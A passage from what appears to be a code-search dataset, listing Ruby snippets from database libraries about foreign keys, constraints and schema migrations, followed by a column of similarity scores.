"def test_keeping_default_and_notnull_constraints_on_change\n connection.create_table :testings do |t|\n t.column :title, :string\n end\n person_klass = Class.new(ActiveRecord::Base)\n person_klass.table_name = \"testings\"\n\n person_klass.connection.add_column \"testings\", \"wealth\", :integer, null: false, default: 99\n person_klass.reset_column_information\n assert_equal 99, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n assert_nothing_raised { person_klass.connection.execute(\"insert into testings (title) values ('tester')\") }\n\n # change column default to see that column doesn't lose its not null definition\n person_klass.connection.change_column_default \"testings\", \"wealth\", 100\n person_klass.reset_column_information\n assert_equal 100, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n\n # rename column to see that column doesn't lose its not null and/or default definition\n person_klass.connection.rename_column \"testings\", \"wealth\", \"money\"\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"wealth\"]\n assert_equal 100, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: false, default: 1000\n person_klass.reset_column_information\n assert_equal 1000, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column, make it nullable and clear default\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: true, default: nil\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal true, person_klass.columns_hash[\"money\"].null\n\n # change_column_null, make it not nullable and set null values to a default value\n person_klass.connection.execute(\"UPDATE testings SET money = NULL\")\n person_klass.connection.change_column_null \"testings\", \"money\", false, 2000\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal false, person_klass.columns_hash[\"money\"].null\n assert_equal 2000, connection.select_values(\"SELECT money FROM testings\").first.to_i\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def _constrainable\n @constrainable ||= {}\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def saint_saens; end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def test_emailers_restrict_delete\n\t\terr = assert_raises PG::ForeignKeyViolation do\n\t\t\tDB.exec(\"DELETE FROM people WHERE id=7\")\n\t\tend\n\t\tassert err.message.include? 'emailers_person_id_fkey'\n\tend",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def foreign_key_params\n params.require(:foreign_key).permit(:source_column, :source_table, :target_column, :target_table)\n end",
"def supports_exclusion_constraints?\n false\n end",
"def test_foreign_key_violations_on_delete_are_translated_to_specific_exception\n insert_into_fk_test_has_fk fk_id: 1\n\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n @connection.execute \"DELETE FROM fk_test_has_pk WHERE pk_id = 1\"\n end\n\n assert_not_nil error.cause\n end",
"def is_userconstraint?(); @type == GRT_USERCONSTRAINT; end",
"def supports_foreign_key_parsing?\n respond_to?(:foreign_key_list)\n end",
"def stores_foreign_key?\n false\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def compound_key_constraints\n @compound_key_constraints ||= {}\n end",
"def column_definition_primary_key_sql(sql, column)\n if column[:primary_key]\n if name = column[:primary_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << \" \" << primary_key_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:primary_key_deferrable])\n end\n end",
"def foreign_key?\n index == entity.key_column && !entity.is_core\n end",
"def foreign_key?\n options.fetch(:foreign_key, false)\n end",
"def column_definition_references_sql(sql, column)\n if column[:table]\n if name = column[:foreign_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << column_references_column_constraint_sql(column)\n end\n end",
"def unique_constraint_sql_fragment(_)\n 'UNIQUE'\n end",
"def database_specific_error_class(exception, opts)\n case exception.errno\n when 1048\n NotNullConstraintViolation\n when 1062\n UniqueConstraintViolation\n when 1451, 1452\n ForeignKeyConstraintViolation\n else\n super\n end\n end",
"def validate(record)\n if record._database_validations_fallback\n super\n else\n return unless record.public_send(foreign_key).blank? && record.public_send(association).blank?\n\n record.errors.add(association, :blank, message: :required)\n end\n end",
"def add_constraints(scope)\n tables = construct_tables\n \n chain.each_with_index do |reflection, i|\n table, foreign_table = tables.shift, tables.first\n \n if reflection.source_macro == :has_and_belongs_to_many\n join_table = tables.shift\n \n scope = scope.joins(join(\n join_table,\n table[association_primary_key].\n eq(join_table[association_foreign_key])\n ))\n \n table, foreign_table = join_table, tables.first\n end\n \n if reflection.source_macro == :belongs_to\n if reflection.options[:polymorphic]\n key = reflection.association_primary_key(self.klass)\n else\n key = reflection.association_primary_key\n end\n \n foreign_key = reflection.foreign_key\n else\n key = reflection.foreign_key\n foreign_key = reflection.active_record_primary_key\n end\n \n # this is our addition\n table, key = maybe_split(table, key, reflection)\n foreign_table, foreign_key = maybe_split(foreign_table, foreign_key, reflection)\n # end\n \n if reflection == chain.last \n bind_val = bind scope, table.table_name, key.to_s, owner[foreign_key]\n scope = scope.where(table[key].eq(bind_val))\n \n if reflection.type\n value = owner.class.base_class.name\n bind_val = bind scope, table.table_name, reflection.type.to_s, value\n scope = scope.where(table[reflection.type].eq(bind_val))\n end\n else\n constraint = table[key].eq(foreign_table[foreign_key])\n \n if reflection.type\n type = chain[i + 1].klass.base_class.name\n constraint = constraint.and(table[reflection.type].eq(type))\n end\n \n scope = scope.joins(join(foreign_table, constraint))\n end\n \n # Exclude the scope of the association itself, because that\n # was already merged in the #scope method.\n scope_chain[i].each do |scope_chain_item|\n klass = i == 0 ? self.klass : reflection.klass\n item = eval_scope(klass, scope_chain_item)\n \n if scope_chain_item == self.reflection.scope\n scope.merge! item.except(:where, :includes)\n end\n \n scope.includes! item.includes_values\n scope.where_values += item.where_values\n scope.order_values |= item.order_values\n end\n end\n \n scope\n end",
"def apply_alter_table_generator(name, generator)\n ops = generator.operations\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if add_pk = ops.find{|op| op[:op] == :add_constraint && op[:type] == :primary_key}\n ops = add_pk[:columns].map{|column| {:op => :set_column_null, :name => column, :null => false}} + ops\n end\n end\n\n apply_alter_table(name, ops)\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def apply_constraints_to_record(record, options = {})\n options[:allow_autosave] = false if options[:allow_autosave].nil?\n constraints = options[:constraints] || active_scaffold_constraints\n\n config = record.is_a?(active_scaffold_config.model) ? active_scaffold_config : active_scaffold_config_for(record.class)\n constraints.each do |k, v|\n column = config.columns[k]\n if column&.association\n if column.association.collection?\n record.send(k.to_s).send(:<<, column.association.klass.find(v))\n elsif column.association.polymorphic?\n unless v.is_a?(Array) && v.size == 2\n raise ActiveScaffold::MalformedConstraint, polymorphic_constraint_error(column.association), caller\n end\n record.send(\"#{k}=\", v[0].constantize.find(v[1]))\n elsif !column.association.source_reflection&.options&.include?(:through) # regular singular association, or one-level through association\n record.send(\"#{k}=\", column.association.klass.find(v))\n\n # setting the belongs_to side of a has_one isn't safe. if the has_one was already\n # specified, rails won't automatically clear out the previous associated record.\n #\n # note that we can't take the extra step to correct this unless we're permitted to\n # run operations where activerecord auto-saves the object.\n reverse = column.association.reverse_association\n if reverse.singular? && !reverse.belongs_to? && options[:allow_autosave]\n record.send(k).send(\"#{reverse.name}=\", record)\n end\n end\n else\n record.send(\"#{k}=\", v)\n end\n end\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n sql << \"CHECK #{filter_expr(constraint[:check])}\"\n sql\n end",
"def bindable?(doc)\n forced_nil_inverse? || (!!inverse && doc.fields.keys.include?(foreign_key))\n end",
"def test_foreign_key_violations_on_insert_are_translated_to_specific_exception\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n insert_into_fk_test_has_fk\n end\n\n assert_not_nil error.cause\n end",
"def _semantics_check(clazz, buffer)\n if constraints.primary_key.nil?\n buffer.add_error(self, clazz::MissingPrimaryKey)\n end\n super(clazz, buffer)\n end",
"def need_associated_primary_key?\n false\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def need_associated_primary_key?\n true\n end"
] |
[
"0.79280597",
"0.79274535",
"0.7805954",
"0.734535",
"0.72932184",
"0.68518835",
"0.6851376",
"0.6846686",
"0.65102047",
"0.63518226",
"0.63061714",
"0.63061714",
"0.6213247",
"0.6213247",
"0.6106287",
"0.6096646",
"0.608334",
"0.6045513",
"0.6045513",
"0.6045513",
"0.6021384",
"0.600553",
"0.600553",
"0.59802794",
"0.5962776",
"0.5953225",
"0.5950546",
"0.59376353",
"0.5930125",
"0.59262735",
"0.5911484",
"0.59014225",
"0.59014225",
"0.58497566",
"0.58497566",
"0.58409536",
"0.5813042",
"0.57669663",
"0.5731412",
"0.5728956",
"0.57251835",
"0.57120043",
"0.57038563",
"0.5689721",
"0.5684284",
"0.5670924",
"0.56476325",
"0.5634747",
"0.5620577",
"0.5609877",
"0.56077576",
"0.56035143",
"0.5584245",
"0.55492103",
"0.5542081",
"0.5535381",
"0.5535381",
"0.5523422",
"0.551439",
"0.55017275",
"0.5500663",
"0.54955256",
"0.5492991",
"0.5485903",
"0.5468469",
"0.54429615",
"0.5437908",
"0.5412928",
"0.536716",
"0.534708",
"0.5339759",
"0.5315693",
"0.5303086",
"0.5279549",
"0.526408",
"0.5258896",
"0.524789",
"0.5246512",
"0.5244143",
"0.5237569",
"0.52365625",
"0.5234686",
"0.5232824",
"0.52316725",
"0.52273303",
"0.52206355",
"0.5220494",
"0.52070624",
"0.51929504",
"0.5189598",
"0.5185038",
"0.517124",
"0.51536494",
"0.5137656",
"0.5131563",
"0.51253927",
"0.51225525",
"0.50938976",
"0.5091623",
"0.50774205"
] |
0.540124
|
68
|
PostgreSQL supports deferrable foreign key constraints.
|
def supports_deferrable_foreign_key_constraints?
true
end
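For context, a minimal Sequel sketch (assuming the Sequel gem on PostgreSQL and a hypothetical connection URL): a deferrable foreign key postpones the reference check until COMMIT, so mutually dependent rows can be inserted in any order within one transaction.

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb') # hypothetical connection URL

DB.create_table?(:items) do
  primary_key :id
  # Rendered as REFERENCES items ... DEFERRABLE INITIALLY DEFERRED.
  foreign_key :parent_id, :items, deferrable: true
end

DB.transaction do
  DB[:items].insert(id: 2, parent_id: 1) # parent row does not exist yet; check is deferred
  DB[:items].insert(id: 1)               # parent arrives before COMMIT
end                                      # the foreign key is verified here, at commit time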
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_deferrable_foreign_key_constraints?\n supports_deferrable_constraints?\n end",
"def foreign_key_present?\n false\n end",
"def foreign_key_present?\n false\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def foreign_key?\n false\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def foreign_key_constraints_enabled?\n @disable_foreign_key_constraints != true\n end",
"def foreign_key?\n true\n end",
"def supports_foreign_keys?\n false\n end",
"def supports_foreign_keys?\n false\n end",
"def foreign_key_default\n nil\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def stores_foreign_key?; true; end",
"def check_add_foreign_key(*args)\n options = args.extract_options!\n from_table, to_table = args\n\n validate = options.fetch(:validate, true)\n if postgresql? && validate\n if StrongMigrations.safe_by_default\n safe_add_foreign_key(*args, **options)\n throw :safe\n end\n\n raise_error :add_foreign_key,\n add_foreign_key_code: command_str(\"add_foreign_key\", [from_table, to_table, options.merge(validate: false)]),\n validate_foreign_key_code: command_str(\"validate_foreign_key\", [from_table, to_table])\n end\n end",
"def supports_foreign_keys_in_create?\n supports_foreign_keys?\n end",
"def supports_external_drop_constraints?() true; end",
"def supports_foreign_tables?\n false\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_external_drop_constraints?() false; end",
"def implementation_no_master_association\n defined?(foreign_key_name) && foreign_key_name.blank?\n end",
"def check_add_foreign_key(*args); end",
"def foreign_key?\n options.fetch(:foreign_key, false)\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def can_add_primary_key_constraint_on_nullable_columns?\n true\n end",
"def supports_deferrable_constraints?\n false\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def test_add_invalid_foreign_key\n @connection.add_foreign_key :astronauts, :rockets, column: \"rocket_id\", validate: false\n\n foreign_keys = @connection.foreign_keys(\"astronauts\")\n assert_equal 1, foreign_keys.size\n\n fk = foreign_keys.first\n assert_predicate fk, :validated?\n end",
"def drop_foreign_key(table, field)\n execute \"ALTER TABLE #{table} DROP FOREIGN KEY #{constraint_name(table, field)}\"\n end",
"def test_adding_bears_to_the_farm_with_t_dot_foreign_key_farm_dependent_nullify\n premigrate\n table = \"bears\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\) ON DELETE SET NULL/, schema(table))\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def supports_deferrable_constraints?\n false\n end",
"def check_all_foreign_keys_valid!\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def quote_constraint_name(foreign_key)\n quote_table_name(foreign_key)\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def stores_foreign_key?\n false\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def all_foreign_keys_valid?\n check_all_foreign_keys_valid!\n true\n rescue ActiveRecord::StatementInvalid\n false\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def foreign_key\n @foreign_key ||= @options[:foreign_key] ? @options[:foreign_key].to_s :\n default_foreign_key_field\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def foreign_key_params\n params.require(:foreign_key).permit(:source_column, :source_table, :target_column, :target_table)\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def foreign_key?\n index == entity.key_column && !entity.is_core\n end",
"def spanner_create_table_with_foreign_key_delete_cascade project_id:, instance_id:, database_id:\n db_admin_client = Google::Cloud::Spanner::Admin::Database.database_admin\n\n database_path = db_admin_client.database_path project: project_id,\n instance: instance_id,\n database: database_id\n\n job = db_admin_client.update_database_ddl database: database_path, statements: [\n %{ CREATE TABLE Customers (\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n ) PRIMARY KEY (CustomerId)},\n %{ CREATE TABLE ShoppingCarts (\n CartId INT64 NOT NULL,\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n CONSTRAINT FKShoppingCartsCustomerId FOREIGN KEY (CustomerId)\n REFERENCES Customers (CustomerId) ON DELETE CASCADE\n ) PRIMARY KEY (CartId)}\n ]\n\n puts \"Waiting for operation to complete...\"\n job.wait_until_done!\n puts \"Created Customers and ShoppingCarts table with FKShoppingCartsCustomerId \\\n foreign key constraint on database #{database_id} on instance #{instance_id}\"\nend",
"def column_definition_references_sql(sql, column)\n if column[:table]\n if name = column[:foreign_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << column_references_column_constraint_sql(column)\n end\n end",
"def test_foreign_key_violations_on_delete_are_translated_to_specific_exception\n insert_into_fk_test_has_fk fk_id: 1\n\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n @connection.execute \"DELETE FROM fk_test_has_pk WHERE pk_id = 1\"\n end\n\n assert_not_nil error.cause\n end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def reverse_foreign_keys\n connection.reverse_foreign_keys(table_name, \"#{name} Reverse Foreign Keys\")\n end",
"def drop_foreign_key(from_table, from_column)\n execute [ \"alter table #{quote_table_name from_table}\",\n \"drop foreign key #{constraint_name from_table, from_column}\"\n ].join(' ')\n end",
"def foreign_key\n self.name + \"_id\"\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
"def add_concurrent_partitioned_foreign_key(source, target, column:, on_delete: :cascade, name: nil)\n assert_not_in_transaction_block(scope: ERROR_SCOPE)\n\n partition_options = {\n column: column,\n on_delete: on_delete,\n\n # We'll use the same FK name for all partitions and match it to\n # the name used for the partitioned table to follow the convention\n # used by PostgreSQL when adding FKs to new partitions\n name: name.presence || concurrent_partitioned_foreign_key_name(source, column),\n\n # Force the FK validation to true for partitions (and the partitioned table)\n validate: true\n }\n\n if foreign_key_exists?(source, target, **partition_options)\n warning_message = \"Foreign key not created because it exists already \" \\\n \"(this may be due to an aborted migration or similar): \" \\\n \"source: #{source}, target: #{target}, column: #{partition_options[:column]}, \"\\\n \"name: #{partition_options[:name]}, on_delete: #{partition_options[:on_delete]}\"\n\n Gitlab::AppLogger.warn warning_message\n\n return\n end\n\n partitioned_table = find_partitioned_table(source)\n\n partitioned_table.postgres_partitions.order(:name).each do |partition|\n add_concurrent_foreign_key(partition.identifier, target, **partition_options)\n end\n\n with_lock_retries do\n add_foreign_key(source, target, **partition_options)\n end\n end",
"def test_emailers_restrict_delete\n\t\terr = assert_raises PG::ForeignKeyViolation do\n\t\t\tDB.exec(\"DELETE FROM people WHERE id=7\")\n\t\tend\n\t\tassert err.message.include? 'emailers_person_id_fkey'\n\tend",
"def foreign_key_check\n @foreign_key_check ||= \"#{foreign_key}_previously_changed?\" if (stores_foreign_key? && foreign_key)\n end",
"def test_adding_pigs_to_the_farm_with_t_dot_references_farm_foreign_key_true\n premigrate\n table = \"pigs\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\)/, schema(table))\n end",
"def dump_foreign_key_migration(options=OPTS)\n ts = _dump_tables(options)\n <<END_MIG\nSequel.migration do\n change do\n#{ts.map{|t| dump_table_foreign_keys(t)}.reject{|x| x == ''}.join(\"\\n\\n\").gsub(/^/, ' ')}\n end\nend\nEND_MIG\n end",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def supports_foreign_key_parsing?\n respond_to?(:foreign_key_list)\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def is_foreign_key?\n association.present?\n end",
"def add_foreign_key_to(model, *keys)\n # {{{\n keys.flatten! \n mapping = [ keys, model.__associations__.primary_keys[model.table_name] ]\n @foreign_keys[@accessor.table_name] = {} unless @foreign_keys[@accessor.table_name]\n @foreign_keys[@accessor.table_name][model.table_name] = mapping \n # Inherit foreign keys: \n @foreign_keys.update(model.__associations__.foreign_keys)\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def check_foreign_key(field)\n val = self.send(field)\n if val.is_a? ForeignKey\n add_foreign_key_message_to_errors(val)\n end\n end",
"def foreign_key\n association.foreign_key \n end",
"def test_adding_elephants_to_the_farm_with_t_dot_foreign_key_farm_dependent_delete\n premigrate\n table = \"elephants\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\) ON DELETE CASCADE/, schema(table))\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def remove_foreign_key_constraint(table_name, options={})\n constraint_name = options[:name] || \"#{table_name}_ibfk_#{foreign_key}\"\n raise ArgumentError, \"You must specify the constraint name\" if constraint_name.blank?\n \n @connection.remove_foreign_key_constraint(table_name, constraint_name)\n end",
